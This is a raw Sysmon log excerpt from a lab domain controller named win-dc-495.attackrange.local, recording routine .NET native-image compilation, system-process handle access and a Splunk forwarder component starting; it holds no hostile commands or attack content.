13:44:50.736{59A5CD1D-90D2-6005-4901-00000000A301}3160C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\c58-0\System.ServiceProcess.dll2021-01-18 13:44:50.736 10341000x80000000000000005502Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:50.611{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-90D2-6005-4901-00000000A301}3160C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005501Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:50.595{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-90D2-6005-4901-00000000A301}3160C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005500Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:50.595{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-90D2-6005-4901-00000000A301}3160C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005499Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:50.548{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-90D2-6005-4801-00000000A301}3676C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005498Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:50.548{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-90D2-6005-4801-00000000A301}3676C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005497Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:50.548{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-90D2-6005-4801-00000000A301}3676C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000005496Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:44:50.470{59A5CD1D-90D1-6005-4601-00000000A301}3176C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\c68-0\System.Runtime.Remoting.dll2021-01-18 13:44:50.470 10341000x80000000000000005495Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:50.126{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-90D1-6005-4701-00000000A301}4936C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005494Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:50.126{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005493Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:50.126{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005492Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:50.126{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005491Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:50.126{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005490Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:50.126{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005489Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:50.126{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005488Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:50.126{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005487Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:50.126{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005486Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:50.126{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005485Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:50.126{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-90D1-6005-4701-00000000A301}4936C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005484Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:50.126{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-90D1-6005-4701-00000000A301}4936C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000005483Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:49.986{59A5CD1D-90D1-6005-4701-00000000A301}4936C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 11241100x80000000000000005517Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:44:51.955{59A5CD1D-90D3-6005-4D01-00000000A301}3688C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\e68-0\Accessibility.dll2021-01-18 13:44:51.955 10341000x80000000000000005516Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:51.908{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-90D3-6005-4D01-00000000A301}3688C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005515Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:51.892{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-90D3-6005-4D01-00000000A301}3688C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005514Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:51.892{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-90D3-6005-4D01-00000000A301}3688C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005513Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:51.861{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-90D3-6005-4C01-00000000A301}4264C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005512Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:51.861{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-90D3-6005-4C01-00000000A301}4264C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005511Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:51.861{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-90D3-6005-4C01-00000000A301}4264C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 